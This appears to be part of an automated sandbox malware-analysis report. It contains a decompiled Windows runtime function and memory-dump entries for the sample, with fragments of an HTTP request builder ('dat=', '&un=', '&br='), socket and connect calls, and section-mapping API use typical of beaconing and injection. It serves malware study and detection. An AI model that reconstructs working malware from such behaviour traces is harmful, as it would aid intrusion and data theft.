                                                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 885266447-871070163
                                                                                                                                                                                                          • Opcode ID: 59bd22401caa4b1d2ef85672f180e783ffd18d641fde067613f302d2e9ca512a
                                                                                                                                                                                                          • Instruction ID: d776d7be6ff3b8cd9a7478f031e79e02a2b3e199cb88dfd87e571eb828b5f716
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59bd22401caa4b1d2ef85672f180e783ffd18d641fde067613f302d2e9ca512a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 855125716006056BEB149B3DDC81FA773ACEF95760F104229FE15DB381EA75EC418BA0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                          			E008FEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                          				intOrPtr* _v28;
                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                          				short _v66;
                                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				intOrPtr _t38;
                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                          				signed int _t44;
                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                          				intOrPtr _t48;
                                                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                          				intOrPtr _t53;
                                                                                                                                                                                                          				signed char _t67;
                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                          				intOrPtr* _t80;
                                                                                                                                                                                                          				intOrPtr _t84;
                                                                                                                                                                                                          				intOrPtr* _t85;
                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                          				void* _t92;
                                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t80 = __edi;
                                                                                                                                                                                                          				_t75 = __edx;
                                                                                                                                                                                                          				_t70 = __ecx;
                                                                                                                                                                                                          				_t84 = _a4;
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                                                                          					E008EDA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                                                                          					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				__eflags = _t38 - 0xffffffff;
                                                                                                                                                                                                          				if(_t38 == 0xffffffff) {
                                                                                                                                                                                                          					_t39 =  *0x9b793c; // 0x0
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(_t84);
                                                                                                                                                                                                          					_t40 = E008D16C0(_t39);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t40 = E008CF9D4(_t38);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_pop(_t85);
                                                                                                                                                                                                          				__eflags = _t40;
                                                                                                                                                                                                          				if(__eflags < 0) {
                                                                                                                                                                                                          					_push(_t40);
                                                                                                                                                                                                          					E00913915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                          						_t76 =  *[fs:0x18];
                                                                                                                                                                                                          						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                                                                          						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                                                                          						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                                                                          							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                                                                          							_v66 = 0x1722;
                                                                                                                                                                                                          							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                                          							_t76 =  &_v72;
                                                                                                                                                                                                          							_push( &_v72);
                                                                                                                                                                                                          							_v28 = _t85;
                                                                                                                                                                                                          							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                                                                          							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                                          							_push(0x10);
                                                                                                                                                                                                          							_push(0x20402);
                                                                                                                                                                                                          							E008D01A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							_t43 = _v8;
                                                                                                                                                                                                          							_push(_t80);
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							__eflags = _t43 - 0xffffffff;
                                                                                                                                                                                                          							if(_t43 == 0xffffffff) {
                                                                                                                                                                                                          								_t71 =  *0x9b793c; // 0x0
                                                                                                                                                                                                          								_push(_t85);
                                                                                                                                                                                                          								_t44 = E008D1F28(_t71);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t44 = E008CF8CC(_t43);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t44 - 0x102;
                                                                                                                                                                                                          							if(_t44 != 0x102) {
                                                                                                                                                                                                          								__eflags = _t44;
                                                                                                                                                                                                          								if(__eflags < 0) {
                                                                                                                                                                                                          									_push(_t44);
                                                                                                                                                                                                          									E00913915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                                                                          									asm("int3");
                                                                                                                                                                                                          									E00952306(_t85);
                                                                                                                                                                                                          									__eflags = _t67 & 0x00000002;
                                                                                                                                                                                                          									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                                                                          										_t7 = _t67 + 2; // 0x4
                                                                                                                                                                                                          										_t72 = _t7;
                                                                                                                                                                                                          										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                                                                          										__eflags = _t67 - _t67;
                                                                                                                                                                                                          										if(_t67 == _t67) {
                                                                                                                                                                                                          											E008FEC56(_t72, _t76, _t80, _t85);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									__eflags = _v24;
                                                                                                                                                                                                          									if(_v24 != 0) {
                                                                                                                                                                                                          										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									return 2;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L36;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                                                                          							_push(_t67);
                                                                                                                                                                                                          							_t46 = E00914FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                                                                          							_push(_t77);
                                                                                                                                                                                                          							E00923F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                                                                          							_t48 =  *_t85;
                                                                                                                                                                                                          							_t92 = _t91 + 0x18;
                                                                                                                                                                                                          							__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                          							if(_t48 == 0xffffffff) {
                                                                                                                                                                                                          								_t49 = 0;
                                                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                                          							_push(_t49);
                                                                                                                                                                                                          							_t50 = _v12;
                                                                                                                                                                                                          							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                                                                          							_push(_t85);
                                                                                                                                                                                                          							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                                                                          							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                                                                          							E00923F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                                                                          							_t53 =  *_t85;
                                                                                                                                                                                                          							_t93 = _t92 + 0x20;
                                                                                                                                                                                                          							_t67 = _t67 + 1;
                                                                                                                                                                                                          							__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                          							if(_t53 != 0xffffffff) {
                                                                                                                                                                                                          								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                                                          								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t67 - 2;
                                                                                                                                                                                                          							if(_t67 > 2) {
                                                                                                                                                                                                          								__eflags = _t85 - 0x9b20c0;
                                                                                                                                                                                                          								if(_t85 != 0x9b20c0) {
                                                                                                                                                                                                          									_t76 = _a4;
                                                                                                                                                                                                          									__eflags = _a4 - _a8;
                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                          										E0095217A(_t71, __eflags, _t85);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							_push(0x65);
                                                                                                                                                                                                          							_a8 = _a4;
                                                                                                                                                                                                          							E00923F92();
                                                                                                                                                                                                          							_t91 = _t93 + 0xc;
                                                                                                                                                                                                          							__eflags =  *0x7ffe0382;
                                                                                                                                                                                                          							if( *0x7ffe0382 != 0) {
                                                                                                                                                                                                          								goto L21;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					return _t40;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L36:
                                                                                                                                                                                                          			}

































                                                                                                                                                                                                          0x009324f2
                                                                                                                                                                                                          0x009324ef
                                                                                                                                                                                                          0x009324e7
                                                                                                                                                                                                          0x009324fa
                                                                                                                                                                                                          0x009324ff
                                                                                                                                                                                                          0x00932501
                                                                                                                                                                                                          0x00932503
                                                                                                                                                                                                          0x00932506
                                                                                                                                                                                                          0x0093250b
                                                                                                                                                                                                          0x008feb8c
                                                                                                                                                                                                          0x008feb93
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008feb93
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008feb99
                                                                                                                                                                                                          0x008fec85
                                                                                                                                                                                                          0x008fec85
                                                                                                                                                                                                          0x008fec85
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0093248D
                                                                                                                                                                                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009324BD
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 009324FA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                                                          • API String ID: 0-3177188983
                                                                                                                                                                                                          • Opcode ID: 1232d4a2079dfa96f418e58598ca892b8701b1a1754936db9aea16bc2c7bdf76
                                                                                                                                                                                                          • Instruction ID: 856a527f1ce8c5fde9ec2efe89650043451bb4926ce9085bc88321939ec7c8be
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1232d4a2079dfa96f418e58598ca892b8701b1a1754936db9aea16bc2c7bdf76
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4641D770600208BBDB20DF68DD89FAA77B9FF84720F208615F665DB3E1D634E9418B61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fassign
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3965848254-0
                                                                                                                                                                                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                                          • Instruction ID: 344cdb0f95704285d6eb9010bc8a075f5dd08f1e5e91ee035c4815966f775f30
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB916C31D0020AEFDF24DF98C8556AEB7B9FF55304F24847AD451AA6E2E7305B81CB91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: getaddrinforecvsetsockopt
                                                                                                                                                                                                          • String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
                                                                                                                                                                                                          • API String ID: 1564272048-2976227712
                                                                                                                                                                                                          • Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                                                                                                                                          • Instruction ID: 640501723da83b261ddd94bac95920f85f75d083efa04e12976ab5e5b69a1e9d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69629130618F088BC76AEB68D4947EAB7E6FB98304F50492ED49BD7242DF30A545CB81
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: closesocket
                                                                                                                                                                                                          • String ID: clos$esoc$ket
                                                                                                                                                                                                          • API String ID: 2781271927-3604069445
                                                                                                                                                                                                          • Opcode ID: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                                                                                                                                                          • Instruction ID: 9137c2caa85c3f16a2eb5e58e9eba40ea019fffd0ceab21b505d47b8ffc6a19b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4F06D7021CB089BCBC0DF1894887A9B7E1FB99314F54056DE48DCA204CB7885428782
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: closesocket
                                                                                                                                                                                                          • String ID: clos$esoc$ket
                                                                                                                                                                                                          • API String ID: 2781271927-3604069445
                                                                                                                                                                                                          • Opcode ID: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                                                                                                                                                          • Instruction ID: ccc7fd36a661c19efbe7800734688902fe5c6d81044139777be5c32de60d3784
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF01770618B089FCBC4EF18D0C87A9B7E1FB99314F64556DB44ECA244CB7889468B82
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: connect
                                                                                                                                                                                                          • String ID: conn$ect
                                                                                                                                                                                                          • API String ID: 1959786783-716201944
                                                                                                                                                                                                          • Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                                                                                                                                                          • Instruction ID: ef179d687af4cf77a09852ba34abc9eb752414c65464da5fbe748bb650520297
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA012170618A088FDB94EF5CE088B15BBE0FB59314F1545AEE90DCB267CB74C8858B85
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: connect
                                                                                                                                                                                                          • String ID: conn$ect
                                                                                                                                                                                                          • API String ID: 1959786783-716201944
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: send
                                                                                                                                                                                                          • String ID: send
                                                                                                                                                                                                          • API String ID: 2809346765-2809346765
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: send
                                                                                                                                                                                                          • String ID: send
                                                                                                                                                                                                          • API String ID: 2809346765-2809346765
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                                          • String ID: sock
                                                                                                                                                                                                          • API String ID: 98920635-2415254727
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 01E4691F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375982060.0000000001E40000.00000040.00000001.sdmp, Offset: 01E40000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                          • API String ID: 1778838933-4108050209
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375982060.0000000001E40000.00000040.00000001.sdmp, Offset: 01E40000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Section$CloseCreateView
                                                                                                                                                                                                          • String ID: @$@
                                                                                                                                                                                                          • API String ID: 1133238012-149943524
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375982060.0000000001E40000.00000040.00000001.sdmp, Offset: 01E40000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Section$CreateView
                                                                                                                                                                                                          • String ID: @$@
                                                                                                                                                                                                          • API String ID: 1585966358-149943524
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 01E4691F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375982060.0000000001E40000.00000040.00000001.sdmp, Offset: 01E40000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                          • API String ID: 1778838933-4108050209
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B97,007A002E,00000000,00000060,00000000,00000000), ref: 0009820D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID: .z`
                                                                                                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B97,007A002E,00000000,00000060,00000000,00000000), ref: 0009820D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID: .z`
                                                                                                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B97,007A002E,00000000,00000060,00000000,00000000), ref: 0009820D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID: .z`
                                                                                                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtClose.NTDLL(0=,?,?,00093D30,00000000,FFFFFFFF), ref: 00098315
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Close
                                                                                                                                                                                                          • String ID: 0=
                                                                                                                                                                                                          • API String ID: 3535843008-3357461656
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A11,?,?,?,?,00093A11,FFFFFFFF,?,R=,?,00000000), ref: 000982B5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A11,?,?,?,?,00093A11,FFFFFFFF,?,R=,?,00000000), ref: 000982B5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
